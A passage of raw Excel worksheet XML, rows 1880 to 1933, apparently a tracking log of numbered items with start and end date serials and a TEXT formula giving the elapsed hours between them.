      <c r="B1880">
        <v>11050</v>
      </c>
      <c r="C1880" t="s">
        <v>4820</v>
      </c>
      <c r="D1880" t="s">
        <v>7</v>
      </c>
      <c r="E1880" s="1">
        <v>43225.299212962964</v>
      </c>
      <c r="F1880" s="1">
        <v>43235.731319444443</v>
      </c>
      <c r="G1880" t="s">
        <v>16</v>
      </c>
      <c r="H1880" t="str">
        <f>TEXT(F1880-E1880,"[h]")</f>
        <v>250</v>
      </c>
    </row>
    <row r="1881" spans="1:8">
      <c r="A1881" t="s">
        <v>4821</v>
      </c>
      <c r="B1881">
        <v>11047</v>
      </c>
      <c r="C1881" t="s">
        <v>4822</v>
      </c>
      <c r="D1881" t="s">
        <v>7</v>
      </c>
      <c r="E1881" s="1">
        <v>43224.816342592596</v>
      </c>
      <c r="F1881" s="1">
        <v>43235.731319444443</v>
      </c>
      <c r="G1881" t="s">
        <v>732</v>
      </c>
      <c r="H1881" t="str">
        <f>TEXT(F1881-E1881,"[h]")</f>
        <v>261</v>
      </c>
    </row>
    <row r="1882" spans="1:8">
      <c r="A1882" t="s">
        <v>4823</v>
      </c>
      <c r="B1882">
        <v>11046</v>
      </c>
      <c r="C1882" t="s">
        <v>4824</v>
      </c>
      <c r="D1882" t="s">
        <v>7</v>
      </c>
      <c r="E1882" s="1">
        <v>43224.5155787037</v>
      </c>
      <c r="F1882" s="1">
        <v>43470.946423611109</v>
      </c>
      <c r="G1882" t="s">
        <v>72</v>
      </c>
      <c r="H1882" t="str">
        <f>TEXT(F1882-E1882,"[h]")</f>
        <v>5914</v>
      </c>
    </row>
    <row r="1883" spans="1:8">
      <c r="A1883" t="s">
        <v>4609</v>
      </c>
      <c r="B1883">
        <v>11043</v>
      </c>
      <c r="C1883" t="s">
        <v>4610</v>
      </c>
      <c r="D1883" t="s">
        <v>7</v>
      </c>
      <c r="E1883" s="1">
        <v>43224.381030092591</v>
      </c>
      <c r="F1883" s="1">
        <v>43231.013541666667</v>
      </c>
      <c r="G1883" t="s">
        <v>16</v>
      </c>
      <c r="H1883" t="str">
        <f>TEXT(F1883-E1883,"[h]")</f>
        <v>159</v>
      </c>
    </row>
    <row r="1884" spans="1:8">
      <c r="A1884" t="s">
        <v>8</v>
      </c>
      <c r="B1884">
        <v>11038</v>
      </c>
      <c r="C1884" t="s">
        <v>9</v>
      </c>
      <c r="D1884" t="s">
        <v>7</v>
      </c>
      <c r="E1884" s="1">
        <v>43223.260081018518</v>
      </c>
      <c r="F1884" s="1">
        <v>43246.244143518517</v>
      </c>
      <c r="G1884" t="s">
        <v>10</v>
      </c>
      <c r="H1884" t="str">
        <f>TEXT(F1884-E1884,"[h]")</f>
        <v>551</v>
      </c>
    </row>
    <row r="1885" spans="1:8">
      <c r="A1885" t="s">
        <v>11</v>
      </c>
      <c r="B1885">
        <v>11037</v>
      </c>
      <c r="C1885" t="s">
        <v>12</v>
      </c>
      <c r="D1885" t="s">
        <v>7</v>
      </c>
      <c r="E1885" s="1">
        <v>43223.247465277775</v>
      </c>
      <c r="F1885" s="1">
        <v>43230.046701388892</v>
      </c>
      <c r="G1885" t="s">
        <v>13</v>
      </c>
      <c r="H1885" t="str">
        <f>TEXT(F1885-E1885,"[h]")</f>
        <v>163</v>
      </c>
    </row>
    <row r="1886" spans="1:8">
      <c r="A1886" t="s">
        <v>14</v>
      </c>
      <c r="B1886">
        <v>11036</v>
      </c>
      <c r="C1886" t="s">
        <v>15</v>
      </c>
      <c r="D1886" t="s">
        <v>7</v>
      </c>
      <c r="E1886" s="1">
        <v>43223.184224537035</v>
      </c>
      <c r="F1886" s="1">
        <v>43230.076655092591</v>
      </c>
      <c r="G1886" t="s">
        <v>16</v>
      </c>
      <c r="H1886" t="str">
        <f>TEXT(F1886-E1886,"[h]")</f>
        <v>165</v>
      </c>
    </row>
    <row r="1887" spans="1:8">
      <c r="A1887" t="s">
        <v>17</v>
      </c>
      <c r="B1887">
        <v>11031</v>
      </c>
      <c r="C1887" t="s">
        <v>18</v>
      </c>
      <c r="D1887" t="s">
        <v>7</v>
      </c>
      <c r="E1887" s="1">
        <v>43222.060729166667</v>
      </c>
      <c r="F1887" s="1">
        <v>43235.704560185186</v>
      </c>
      <c r="G1887" t="s">
        <v>19</v>
      </c>
      <c r="H1887" t="str">
        <f>TEXT(F1887-E1887,"[h]")</f>
        <v>327</v>
      </c>
    </row>
    <row r="1888" spans="1:8">
      <c r="A1888" t="s">
        <v>20</v>
      </c>
      <c r="B1888">
        <v>11028</v>
      </c>
      <c r="C1888" t="s">
        <v>21</v>
      </c>
      <c r="D1888" t="s">
        <v>7</v>
      </c>
      <c r="E1888" s="1">
        <v>43221.836284722223</v>
      </c>
      <c r="F1888" s="1">
        <v>43251.036157407405</v>
      </c>
      <c r="G1888" t="s">
        <v>22</v>
      </c>
      <c r="H1888" t="str">
        <f>TEXT(F1888-E1888,"[h]")</f>
        <v>700</v>
      </c>
    </row>
    <row r="1889" spans="1:8">
      <c r="A1889" t="s">
        <v>23</v>
      </c>
      <c r="B1889">
        <v>11027</v>
      </c>
      <c r="C1889" t="s">
        <v>24</v>
      </c>
      <c r="D1889" t="s">
        <v>7</v>
      </c>
      <c r="E1889" s="1">
        <v>43221.627106481479</v>
      </c>
      <c r="F1889" s="1">
        <v>43222.707256944443</v>
      </c>
      <c r="G1889" t="s">
        <v>25</v>
      </c>
      <c r="H1889" t="str">
        <f>TEXT(F1889-E1889,"[h]")</f>
        <v>25</v>
      </c>
    </row>
    <row r="1890" spans="1:8" hidden="1">
      <c r="A1890" t="s">
        <v>26</v>
      </c>
      <c r="B1890">
        <v>11026</v>
      </c>
      <c r="C1890" t="s">
        <v>27</v>
      </c>
      <c r="D1890" t="s">
        <v>7</v>
      </c>
      <c r="E1890" s="1">
        <v>43221.552025462966</v>
      </c>
      <c r="F1890" s="1">
        <v>43238.299328703702</v>
      </c>
      <c r="G1890" t="s">
        <v>28</v>
      </c>
      <c r="H1890" t="str">
        <f>TEXT(F1890-E1890,"[h]")</f>
        <v>401</v>
      </c>
    </row>
    <row r="1891" spans="1:8">
      <c r="A1891" t="s">
        <v>29</v>
      </c>
      <c r="B1891">
        <v>11023</v>
      </c>
      <c r="C1891" t="s">
        <v>30</v>
      </c>
      <c r="D1891" t="s">
        <v>7</v>
      </c>
      <c r="E1891" s="1">
        <v>43221.273599537039</v>
      </c>
      <c r="F1891" s="1">
        <v>43234.610671296294</v>
      </c>
      <c r="G1891" t="s">
        <v>31</v>
      </c>
      <c r="H1891" t="str">
        <f>TEXT(F1891-E1891,"[h]")</f>
        <v>320</v>
      </c>
    </row>
    <row r="1892" spans="1:8" hidden="1">
      <c r="A1892" t="s">
        <v>32</v>
      </c>
      <c r="B1892">
        <v>11021</v>
      </c>
      <c r="C1892" t="s">
        <v>33</v>
      </c>
      <c r="D1892" t="s">
        <v>7</v>
      </c>
      <c r="E1892" s="1">
        <v>43220.892569444448</v>
      </c>
      <c r="F1892" s="1">
        <v>43246.244143518517</v>
      </c>
      <c r="G1892" t="s">
        <v>34</v>
      </c>
      <c r="H1892" t="str">
        <f>TEXT(F1892-E1892,"[h]")</f>
        <v>608</v>
      </c>
    </row>
    <row r="1893" spans="1:8" hidden="1">
      <c r="A1893" t="s">
        <v>35</v>
      </c>
      <c r="B1893">
        <v>11018</v>
      </c>
      <c r="C1893" t="s">
        <v>36</v>
      </c>
      <c r="D1893" t="s">
        <v>7</v>
      </c>
      <c r="E1893" s="1">
        <v>43220.694363425922</v>
      </c>
      <c r="F1893" s="1">
        <v>43258.84878472222</v>
      </c>
      <c r="G1893" t="s">
        <v>37</v>
      </c>
      <c r="H1893" t="str">
        <f>TEXT(F1893-E1893,"[h]")</f>
        <v>915</v>
      </c>
    </row>
    <row r="1894" spans="1:8" hidden="1">
      <c r="A1894" t="s">
        <v>38</v>
      </c>
      <c r="B1894">
        <v>11016</v>
      </c>
      <c r="C1894" t="s">
        <v>39</v>
      </c>
      <c r="D1894" t="s">
        <v>7</v>
      </c>
      <c r="E1894" s="1">
        <v>43220.682766203703</v>
      </c>
      <c r="F1894" s="1">
        <v>43285.70753472222</v>
      </c>
      <c r="G1894" t="s">
        <v>40</v>
      </c>
      <c r="H1894" t="str">
        <f>TEXT(F1894-E1894,"[h]")</f>
        <v>1560</v>
      </c>
    </row>
    <row r="1895" spans="1:8" hidden="1">
      <c r="A1895" t="s">
        <v>41</v>
      </c>
      <c r="B1895">
        <v>11012</v>
      </c>
      <c r="C1895" t="s">
        <v>42</v>
      </c>
      <c r="D1895" t="s">
        <v>7</v>
      </c>
      <c r="E1895" s="1">
        <v>43220.054027777776</v>
      </c>
      <c r="F1895" s="1">
        <v>43243.058206018519</v>
      </c>
      <c r="G1895" t="s">
        <v>43</v>
      </c>
      <c r="H1895" t="str">
        <f>TEXT(F1895-E1895,"[h]")</f>
        <v>552</v>
      </c>
    </row>
    <row r="1896" spans="1:8" hidden="1">
      <c r="A1896" t="s">
        <v>44</v>
      </c>
      <c r="B1896">
        <v>11011</v>
      </c>
      <c r="C1896" t="s">
        <v>45</v>
      </c>
      <c r="D1896" t="s">
        <v>7</v>
      </c>
      <c r="E1896" s="1">
        <v>43220.017488425925</v>
      </c>
      <c r="F1896" s="1">
        <v>43233.642569444448</v>
      </c>
      <c r="G1896" t="s">
        <v>43</v>
      </c>
      <c r="H1896" t="str">
        <f>TEXT(F1896-E1896,"[h]")</f>
        <v>327</v>
      </c>
    </row>
    <row r="1897" spans="1:8" hidden="1">
      <c r="A1897" t="s">
        <v>46</v>
      </c>
      <c r="B1897">
        <v>11010</v>
      </c>
      <c r="C1897" t="s">
        <v>47</v>
      </c>
      <c r="D1897" t="s">
        <v>7</v>
      </c>
      <c r="E1897" s="1">
        <v>43219.903240740743</v>
      </c>
      <c r="F1897" s="1">
        <v>43235.717905092592</v>
      </c>
      <c r="G1897" t="s">
        <v>48</v>
      </c>
      <c r="H1897" t="str">
        <f>TEXT(F1897-E1897,"[h]")</f>
        <v>379</v>
      </c>
    </row>
    <row r="1898" spans="1:8" hidden="1">
      <c r="A1898" t="s">
        <v>49</v>
      </c>
      <c r="B1898">
        <v>11009</v>
      </c>
      <c r="C1898" t="s">
        <v>50</v>
      </c>
      <c r="D1898" t="s">
        <v>7</v>
      </c>
      <c r="E1898" s="1">
        <v>43219.837187500001</v>
      </c>
      <c r="F1898" s="1">
        <v>43234.631249999999</v>
      </c>
      <c r="G1898" t="s">
        <v>51</v>
      </c>
      <c r="H1898" t="str">
        <f>TEXT(F1898-E1898,"[h]")</f>
        <v>355</v>
      </c>
    </row>
    <row r="1899" spans="1:8" hidden="1">
      <c r="B1899">
        <v>11008</v>
      </c>
      <c r="C1899" t="s">
        <v>52</v>
      </c>
      <c r="D1899" t="s">
        <v>7</v>
      </c>
      <c r="E1899" s="1">
        <v>43219.802835648145</v>
      </c>
      <c r="F1899" s="1">
        <v>43219.845497685186</v>
      </c>
      <c r="G1899" t="s">
        <v>51</v>
      </c>
      <c r="H1899" t="str">
        <f>TEXT(F1899-E1899,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1900" spans="1:8" hidden="1">
      <c r="A1900" t="s">
        <v>53</v>
      </c>
      <c r="B1900">
        <v>11006</v>
      </c>
      <c r="C1900" t="s">
        <v>54</v>
      </c>
      <c r="D1900" t="s">
        <v>7</v>
      </c>
      <c r="E1900" s="1">
        <v>43219.592002314814</v>
      </c>
      <c r="F1900" s="1">
        <v>43225.085104166668</v>
      </c>
      <c r="G1900" t="s">
        <v>55</v>
      </c>
      <c r="H1900" t="str">
        <f>TEXT(F1900-E1900,"[h]")</f>
        <v>131</v>
      </c>
    </row>
    <row r="1901" spans="1:8" hidden="1">
      <c r="A1901" t="s">
        <v>56</v>
      </c>
      <c r="B1901">
        <v>11003</v>
      </c>
      <c r="C1901" t="s">
        <v>57</v>
      </c>
      <c r="D1901" t="s">
        <v>7</v>
      </c>
      <c r="E1901" s="1">
        <v>43219.22451388889</v>
      </c>
      <c r="F1901" s="1">
        <v>43225.082627314812</v>
      </c>
      <c r="G1901" t="s">
        <v>51</v>
      </c>
      <c r="H1901" t="str">
        <f>TEXT(F1901-E1901,"[h]")</f>
        <v>140</v>
      </c>
    </row>
    <row r="1902" spans="1:8" hidden="1">
      <c r="A1902" t="s">
        <v>58</v>
      </c>
      <c r="B1902">
        <v>11002</v>
      </c>
      <c r="C1902" t="s">
        <v>59</v>
      </c>
      <c r="D1902" t="s">
        <v>7</v>
      </c>
      <c r="E1902" s="1">
        <v>43219.205196759256</v>
      </c>
      <c r="F1902" s="1">
        <v>43368.675763888888</v>
      </c>
      <c r="G1902" t="s">
        <v>60</v>
      </c>
      <c r="H1902" t="str">
        <f>TEXT(F1902-E1902,"[h]")</f>
        <v>3587</v>
      </c>
    </row>
    <row r="1903" spans="1:8" hidden="1">
      <c r="A1903" t="s">
        <v>61</v>
      </c>
      <c r="B1903">
        <v>10998</v>
      </c>
      <c r="C1903" t="s">
        <v>62</v>
      </c>
      <c r="D1903" t="s">
        <v>7</v>
      </c>
      <c r="E1903" s="1">
        <v>43217.836446759262</v>
      </c>
      <c r="F1903" s="1">
        <v>43362.981527777774</v>
      </c>
      <c r="G1903" t="s">
        <v>63</v>
      </c>
      <c r="H1903" t="str">
        <f>TEXT(F1903-E1903,"[h]")</f>
        <v>3483</v>
      </c>
    </row>
    <row r="1904" spans="1:8" hidden="1">
      <c r="A1904" t="s">
        <v>64</v>
      </c>
      <c r="B1904">
        <v>10997</v>
      </c>
      <c r="C1904" t="s">
        <v>65</v>
      </c>
      <c r="D1904" t="s">
        <v>7</v>
      </c>
      <c r="E1904" s="1">
        <v>43217.705659722225</v>
      </c>
      <c r="F1904" s="1">
        <v>43217.754143518519</v>
      </c>
      <c r="G1904" t="s">
        <v>66</v>
      </c>
      <c r="H1904" t="str">
        <f>TEXT(F1904-E1904,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1905" spans="1:8">
      <c r="A1905" t="s">
        <v>67</v>
      </c>
      <c r="B1905">
        <v>10993</v>
      </c>
      <c r="C1905" t="s">
        <v>68</v>
      </c>
      <c r="D1905" t="s">
        <v>7</v>
      </c>
      <c r="E1905" s="1">
        <v>43217.530543981484</v>
      </c>
      <c r="F1905" s="1">
        <v>43472.594710648147</v>
      </c>
      <c r="G1905" t="s">
        <v>69</v>
      </c>
      <c r="H1905" t="str">
        <f>TEXT(F1905-E1905,"[h]")</f>
        <v>6121</v>
      </c>
    </row>
    <row r="1906" spans="1:8">
      <c r="A1906" t="s">
        <v>70</v>
      </c>
      <c r="B1906">
        <v>10992</v>
      </c>
      <c r="C1906" t="s">
        <v>71</v>
      </c>
      <c r="D1906" t="s">
        <v>7</v>
      </c>
      <c r="E1906" s="1">
        <v>43217.389525462961</v>
      </c>
      <c r="F1906" s="1">
        <v>43563.702303240738</v>
      </c>
      <c r="G1906" t="s">
        <v>72</v>
      </c>
      <c r="H1906" t="str">
        <f>TEXT(F1906-E1906,"[h]")</f>
        <v>8311</v>
      </c>
    </row>
    <row r="1907" spans="1:8" hidden="1">
      <c r="A1907" t="s">
        <v>73</v>
      </c>
      <c r="B1907">
        <v>10991</v>
      </c>
      <c r="C1907" t="s">
        <v>74</v>
      </c>
      <c r="D1907" t="s">
        <v>7</v>
      </c>
      <c r="E1907" s="1">
        <v>43217.345381944448</v>
      </c>
      <c r="F1907" s="1">
        <v>43236.89880787037</v>
      </c>
      <c r="G1907" t="s">
        <v>75</v>
      </c>
      <c r="H1907" t="str">
        <f>TEXT(F1907-E1907,"[h]")</f>
        <v>469</v>
      </c>
    </row>
    <row r="1908" spans="1:8" hidden="1">
      <c r="A1908" t="s">
        <v>76</v>
      </c>
      <c r="B1908">
        <v>10988</v>
      </c>
      <c r="C1908" t="s">
        <v>77</v>
      </c>
      <c r="D1908" t="s">
        <v>7</v>
      </c>
      <c r="E1908" s="1">
        <v>43217.1796875</v>
      </c>
      <c r="F1908" s="1">
        <v>43234.650960648149</v>
      </c>
      <c r="G1908" t="s">
        <v>28</v>
      </c>
      <c r="H1908" t="str">
        <f>TEXT(F1908-E1908,"[h]")</f>
        <v>419</v>
      </c>
    </row>
    <row r="1909" spans="1:8" hidden="1">
      <c r="B1909">
        <v>10987</v>
      </c>
      <c r="C1909" t="s">
        <v>78</v>
      </c>
      <c r="D1909" t="s">
        <v>7</v>
      </c>
      <c r="E1909" s="1">
        <v>43217.157384259262</v>
      </c>
      <c r="F1909" s="1">
        <v>43217.205300925925</v>
      </c>
      <c r="G1909" t="s">
        <v>66</v>
      </c>
      <c r="H1909" t="str">
        <f>TEXT(F1909-E1909,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1910" spans="1:8" hidden="1">
      <c r="A1910" t="s">
        <v>79</v>
      </c>
      <c r="B1910">
        <v>10986</v>
      </c>
      <c r="C1910" t="s">
        <v>80</v>
      </c>
      <c r="D1910" t="s">
        <v>7</v>
      </c>
      <c r="E1910" s="1">
        <v>43216.906342592592</v>
      </c>
      <c r="F1910" s="1">
        <v>43219.251643518517</v>
      </c>
      <c r="G1910" t="s">
        <v>81</v>
      </c>
      <c r="H1910" t="str">
        <f>TEXT(F1910-E1910,"[h]")</f>
        <v>56</v>
      </c>
    </row>
    <row r="1911" spans="1:8" hidden="1">
      <c r="A1911" t="s">
        <v>82</v>
      </c>
      <c r="B1911">
        <v>10985</v>
      </c>
      <c r="C1911" t="s">
        <v>83</v>
      </c>
      <c r="D1911" t="s">
        <v>7</v>
      </c>
      <c r="E1911" s="1">
        <v>43216.737442129626</v>
      </c>
      <c r="F1911" s="1">
        <v>43234.710740740738</v>
      </c>
      <c r="G1911" t="s">
        <v>84</v>
      </c>
      <c r="H1911" t="str">
        <f>TEXT(F1911-E1911,"[h]")</f>
        <v>431</v>
      </c>
    </row>
    <row r="1912" spans="1:8" hidden="1">
      <c r="A1912" t="s">
        <v>85</v>
      </c>
      <c r="B1912">
        <v>10981</v>
      </c>
      <c r="C1912" t="s">
        <v>86</v>
      </c>
      <c r="D1912" t="s">
        <v>7</v>
      </c>
      <c r="E1912" s="1">
        <v>43216.497673611113</v>
      </c>
      <c r="F1912" s="1">
        <v>43397.678622685184</v>
      </c>
      <c r="G1912" t="s">
        <v>87</v>
      </c>
      <c r="H1912" t="str">
        <f>TEXT(F1912-E1912,"[h]")</f>
        <v>4348</v>
      </c>
    </row>
    <row r="1913" spans="1:8" hidden="1">
      <c r="A1913" t="s">
        <v>88</v>
      </c>
      <c r="B1913">
        <v>10980</v>
      </c>
      <c r="C1913" t="s">
        <v>89</v>
      </c>
      <c r="D1913" t="s">
        <v>7</v>
      </c>
      <c r="E1913" s="1">
        <v>43216.496516203704</v>
      </c>
      <c r="F1913" s="1">
        <v>43217.591608796298</v>
      </c>
      <c r="G1913" t="s">
        <v>90</v>
      </c>
      <c r="H1913" t="str">
        <f>TEXT(F1913-E1913,"[h]")</f>
        <v>26</v>
      </c>
    </row>
    <row r="1914" spans="1:8">
      <c r="A1914" t="s">
        <v>91</v>
      </c>
      <c r="B1914">
        <v>10978</v>
      </c>
      <c r="C1914" t="s">
        <v>92</v>
      </c>
      <c r="D1914" t="s">
        <v>7</v>
      </c>
      <c r="E1914" s="1">
        <v>43216.244166666664</v>
      </c>
      <c r="F1914" s="1">
        <v>43259.813819444447</v>
      </c>
      <c r="G1914" t="s">
        <v>25</v>
      </c>
      <c r="H1914" t="str">
        <f>TEXT(F1914-E1914,"[h]")</f>
        <v>1045</v>
      </c>
    </row>
    <row r="1915" spans="1:8" hidden="1">
      <c r="A1915" t="s">
        <v>93</v>
      </c>
      <c r="B1915">
        <v>10975</v>
      </c>
      <c r="C1915" t="s">
        <v>94</v>
      </c>
      <c r="D1915" t="s">
        <v>7</v>
      </c>
      <c r="E1915" s="1">
        <v>43215.799409722225</v>
      </c>
      <c r="F1915" s="1">
        <v>43232.747430555559</v>
      </c>
      <c r="G1915" t="s">
        <v>95</v>
      </c>
      <c r="H1915" t="str">
        <f>TEXT(F1915-E1915,"[h]")</f>
        <v>406</v>
      </c>
    </row>
    <row r="1916" spans="1:8">
      <c r="A1916" t="s">
        <v>96</v>
      </c>
      <c r="B1916">
        <v>10974</v>
      </c>
      <c r="C1916" t="s">
        <v>97</v>
      </c>
      <c r="D1916" t="s">
        <v>7</v>
      </c>
      <c r="E1916" s="1">
        <v>43215.666932870372</v>
      </c>
      <c r="F1916" s="1">
        <v>43215.878148148149</v>
      </c>
      <c r="G1916" t="s">
        <v>98</v>
      </c>
      <c r="H1916" t="str">
        <f>TEXT(F1916-E1916,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="1917" spans="1:8" hidden="1">
      <c r="A1917" t="s">
        <v>99</v>
      </c>
      <c r="B1917">
        <v>10973</v>
      </c>
      <c r="C1917" t="s">
        <v>100</v>
      </c>
      <c r="D1917" t="s">
        <v>7</v>
      </c>
      <c r="E1917" s="1">
        <v>43215.636423611111</v>
      </c>
      <c r="F1917" s="1">
        <v>43215.661631944444</v>
      </c>
      <c r="G1917" t="s">
        <v>66</v>
      </c>
      <c r="H1917" t="str">
        <f>TEXT(F1917-E1917,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1918" spans="1:8" hidden="1">
      <c r="A1918" t="s">
        <v>101</v>
      </c>
      <c r="B1918">
        <v>10971</v>
      </c>
      <c r="C1918" t="s">
        <v>102</v>
      </c>
      <c r="D1918" t="s">
        <v>7</v>
      </c>
      <c r="E1918" s="1">
        <v>43215.230405092596</v>
      </c>
      <c r="F1918" s="1">
        <v>43215.678773148145</v>
      </c>
      <c r="G1918" t="s">
        <v>103</v>
      </c>
      <c r="H1918" t="str">
        <f>TEXT(F1918-E1918,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="1919" spans="1:8">
      <c r="A1919" t="s">
        <v>104</v>
      </c>
      <c r="B1919">
        <v>10970</v>
      </c>
      <c r="C1919" t="s">
        <v>105</v>
      </c>
      <c r="D1919" t="s">
        <v>7</v>
      </c>
      <c r="E1919" s="1">
        <v>43215.212881944448</v>
      </c>
      <c r="F1919" s="1">
        <v>43258.961446759262</v>
      </c>
      <c r="G1919" t="s">
        <v>106</v>
      </c>
      <c r="H1919" t="str">
        <f>TEXT(F1919-E1919,"[h]")</f>
        <v>1049</v>
      </c>
    </row>
    <row r="1920" spans="1:8" hidden="1">
      <c r="A1920" t="s">
        <v>107</v>
      </c>
      <c r="B1920">
        <v>10968</v>
      </c>
      <c r="C1920" t="s">
        <v>108</v>
      </c>
      <c r="D1920" t="s">
        <v>7</v>
      </c>
      <c r="E1920" s="1">
        <v>43215.158090277779</v>
      </c>
      <c r="F1920" s="1">
        <v>43258.961446759262</v>
      </c>
      <c r="G1920" t="s">
        <v>109</v>
      </c>
      <c r="H1920" t="str">
        <f>TEXT(F1920-E1920,"[h]")</f>
        <v>1051</v>
      </c>
    </row>
    <row r="1921" spans="1:8">
      <c r="A1921" t="s">
        <v>110</v>
      </c>
      <c r="B1921">
        <v>10967</v>
      </c>
      <c r="C1921" t="s">
        <v>111</v>
      </c>
      <c r="D1921" t="s">
        <v>7</v>
      </c>
      <c r="E1921" s="1">
        <v>43214.685439814813</v>
      </c>
      <c r="F1921" s="1">
        <v>43214.973275462966</v>
      </c>
      <c r="G1921" t="s">
        <v>112</v>
      </c>
      <c r="H1921" t="str">
        <f>TEXT(F1921-E1921,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="1922" spans="1:8" hidden="1">
      <c r="A1922" t="s">
        <v>113</v>
      </c>
      <c r="B1922">
        <v>10966</v>
      </c>
      <c r="C1922" t="s">
        <v>114</v>
      </c>
      <c r="D1922" t="s">
        <v>7</v>
      </c>
      <c r="E1922" s="1">
        <v>43214.66715277778</v>
      </c>
      <c r="F1922" s="1">
        <v>43571.334039351852</v>
      </c>
      <c r="G1922" t="s">
        <v>115</v>
      </c>
      <c r="H1922" t="str">
        <f>TEXT(F1922-E1922,"[h]")</f>
        <v>8560</v>
      </c>
    </row>
    <row r="1923" spans="1:8" hidden="1">
      <c r="A1923" t="s">
        <v>116</v>
      </c>
      <c r="B1923">
        <v>10965</v>
      </c>
      <c r="C1923" t="s">
        <v>117</v>
      </c>
      <c r="D1923" t="s">
        <v>7</v>
      </c>
      <c r="E1923" s="1">
        <v>43214.067893518521</v>
      </c>
      <c r="F1923" s="1">
        <v>43218.517974537041</v>
      </c>
      <c r="G1923" t="s">
        <v>118</v>
      </c>
      <c r="H1923" t="str">
        <f>TEXT(F1923-E1923,"[h]")</f>
        <v>106</v>
      </c>
    </row>
    <row r="1924" spans="1:8" hidden="1">
      <c r="A1924" t="s">
        <v>130</v>
      </c>
      <c r="B1924">
        <v>10958</v>
      </c>
      <c r="C1924" t="s">
        <v>131</v>
      </c>
      <c r="D1924" t="s">
        <v>7</v>
      </c>
      <c r="E1924" s="1">
        <v>43213.772245370368</v>
      </c>
      <c r="F1924" s="1">
        <v>43213.870347222219</v>
      </c>
      <c r="G1924" t="s">
        <v>90</v>
      </c>
      <c r="H1924" t="str">
        <f>TEXT(F1924-E1924,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1925" spans="1:8" hidden="1">
      <c r="A1925" t="s">
        <v>132</v>
      </c>
      <c r="B1925">
        <v>10957</v>
      </c>
      <c r="C1925" t="s">
        <v>133</v>
      </c>
      <c r="D1925" t="s">
        <v>7</v>
      </c>
      <c r="E1925" s="1">
        <v>43213.725543981483</v>
      </c>
      <c r="F1925" s="1">
        <v>43217.601956018516</v>
      </c>
      <c r="G1925" t="s">
        <v>66</v>
      </c>
      <c r="H1925" t="str">
        <f>TEXT(F1925-E1925,"[h]")</f>
        <v>93</v>
      </c>
    </row>
    <row r="1926" spans="1:8" hidden="1">
      <c r="A1926" t="s">
        <v>134</v>
      </c>
      <c r="B1926">
        <v>10955</v>
      </c>
      <c r="C1926" t="s">
        <v>135</v>
      </c>
      <c r="D1926" t="s">
        <v>7</v>
      </c>
      <c r="E1926" s="1">
        <v>43213.580254629633</v>
      </c>
      <c r="F1926" s="1">
        <v>43217.580810185187</v>
      </c>
      <c r="G1926" t="s">
        <v>66</v>
      </c>
      <c r="H1926" t="str">
        <f>TEXT(F1926-E1926,"[h]")</f>
        <v>96</v>
      </c>
    </row>
    <row r="1927" spans="1:8" hidden="1">
      <c r="A1927" t="s">
        <v>136</v>
      </c>
      <c r="B1927">
        <v>10952</v>
      </c>
      <c r="C1927" t="s">
        <v>137</v>
      </c>
      <c r="D1927" t="s">
        <v>7</v>
      </c>
      <c r="E1927" s="1">
        <v>43212.557511574072</v>
      </c>
      <c r="F1927" s="1">
        <v>43223.633831018517</v>
      </c>
      <c r="G1927" t="s">
        <v>138</v>
      </c>
      <c r="H1927" t="str">
        <f>TEXT(F1927-E1927,"[h]")</f>
        <v>265</v>
      </c>
    </row>
    <row r="1928" spans="1:8">
      <c r="A1928" t="s">
        <v>139</v>
      </c>
      <c r="B1928">
        <v>10951</v>
      </c>
      <c r="C1928" t="s">
        <v>140</v>
      </c>
      <c r="D1928" t="s">
        <v>7</v>
      </c>
      <c r="E1928" s="1">
        <v>43211.988067129627</v>
      </c>
      <c r="F1928" s="1">
        <v>43213.674351851849</v>
      </c>
      <c r="G1928" t="s">
        <v>16</v>
      </c>
      <c r="H1928" t="str">
        <f>TEXT(F1928-E1928,"[h]")</f>
        <v>40</v>
      </c>
    </row>
    <row r="1929" spans="1:8" hidden="1">
      <c r="A1929" t="s">
        <v>141</v>
      </c>
      <c r="B1929">
        <v>10949</v>
      </c>
      <c r="C1929" t="s">
        <v>142</v>
      </c>
      <c r="D1929" t="s">
        <v>7</v>
      </c>
      <c r="E1929" s="1">
        <v>43211.94840277778</v>
      </c>
      <c r="F1929" s="1">
        <v>43217.711226851854</v>
      </c>
      <c r="G1929" t="s">
        <v>66</v>
      </c>
      <c r="H1929" t="str">
        <f>TEXT(F1929-E1929,"[h]")</f>
        <v>138</v>
      </c>
    </row>
    <row r="1930" spans="1:8">
      <c r="A1930" t="s">
        <v>143</v>
      </c>
      <c r="B1930">
        <v>10947</v>
      </c>
      <c r="C1930" t="s">
        <v>144</v>
      </c>
      <c r="D1930" t="s">
        <v>7</v>
      </c>
      <c r="E1930" s="1">
        <v>43211.802893518521</v>
      </c>
      <c r="F1930" s="1">
        <v>43214.929201388892</v>
      </c>
      <c r="G1930" t="s">
        <v>98</v>
      </c>
      <c r="H1930" t="str">
        <f>TEXT(F1930-E1930,"[h]")</f>
        <v>75</v>
      </c>
    </row>
    <row r="1931" spans="1:8">
      <c r="A1931" t="s">
        <v>145</v>
      </c>
      <c r="B1931">
        <v>10946</v>
      </c>
      <c r="C1931" t="s">
        <v>146</v>
      </c>
      <c r="D1931" t="s">
        <v>7</v>
      </c>
      <c r="E1931" s="1">
        <v>43211.800486111111</v>
      </c>
      <c r="F1931" s="1">
        <v>43214.928622685184</v>
      </c>
      <c r="G1931" t="s">
        <v>16</v>
      </c>
      <c r="H1931" t="str">
        <f>TEXT(F1931-E1931,"[h]")</f>
        <v>75</v>
      </c>
    </row>
    <row r="1932" spans="1:8" hidden="1">
      <c r="A1932" t="s">
        <v>147</v>
      </c>
      <c r="B1932">
        <v>10945</v>
      </c>
      <c r="C1932" t="s">
        <v>148</v>
      </c>
      <c r="D1932" t="s">
        <v>7</v>
      </c>
      <c r="E1932" s="1">
        <v>43211.727847222224</v>
      </c>
      <c r="F1932" s="1">
        <v>43211.750659722224</v>
      </c>
      <c r="G1932" t="s">
        <v>90</v>
      </c>
      <c r="H1932" t="str">
        <f>TEXT(F1932-E1932,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1933" spans="1:8" hidden="1">
      <c r="A1933" t="s">
        <v>149</v>
